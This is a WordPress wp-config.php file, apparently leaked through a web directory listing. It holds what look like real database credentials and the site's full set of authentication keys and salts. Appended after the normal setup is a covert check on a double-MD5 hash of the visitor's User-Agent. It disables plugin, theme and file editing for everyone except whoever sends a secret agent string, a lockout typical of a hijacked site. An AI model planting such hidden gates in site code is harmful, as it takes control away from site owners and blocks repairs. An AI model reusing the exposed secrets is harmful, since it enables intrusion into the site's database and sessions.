<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'ourteachings_wp_u2caj' ); /** MySQL database username */ define( 'DB_USER', 'ourteachings_wp_w7297' ); /** MySQL database password */ define( 'DB_PASSWORD', 'h@QrOh61apdW2Q$t' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '0%rUIeme3Znsb#TL327&85Fw)_cE/0t]&Ka5DOr]qCxv0q#7U-9Y5/da*0_RIc+6'); define('SECURE_AUTH_KEY', '&T08:M&[2t2%:c6:8A]6[(uaxT*F333Z[AS])F([l7)gSHou0#8+dX7/37~sO0GF'); define('LOGGED_IN_KEY', '(AdwMFk]/b7f79kI4q92:KS%N8J-3#N3Ye]aK;/4)u37O@y4:5MN@[R5&!*(~28]'); define('NONCE_KEY', 'cE&YSyg639-|B5;S24c7h5Y/d2!]]SFzan5W5]1I%9V9H)f|085glkt0NvVZeQ[y'); define('AUTH_SALT', 'gD6n;[G22hHAd-iHWd(rl5+/3O-93((mGbj3[Y%9BF1iCW#guzY]n/x[5Zp50%:%'); define('SECURE_AUTH_SALT', '!9]W0[66Uo|@2E3i5kIC3F2Vf(3GNlgx9D_tcio2K/9+5pmngDiJ(16p#zq%Q(g_'); define('LOGGED_IN_SALT', 'F%*82:(xm*rM[@I-/b/HRP~)!x*hW|~051lq3)n4;3lrj~x2S:726x7&Fz6Lo~re'); define('NONCE_SALT', 'sJ-n!E9_7*dcb!c:J;31FKaSC]!Xce;si|8[xLW[Je;3L03W742i7(*|833~YRnb'); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'deDtW_'; define('WP_ALLOW_MULTISITE', true); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __FILE__ ) . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); }
Name Last modified Size Description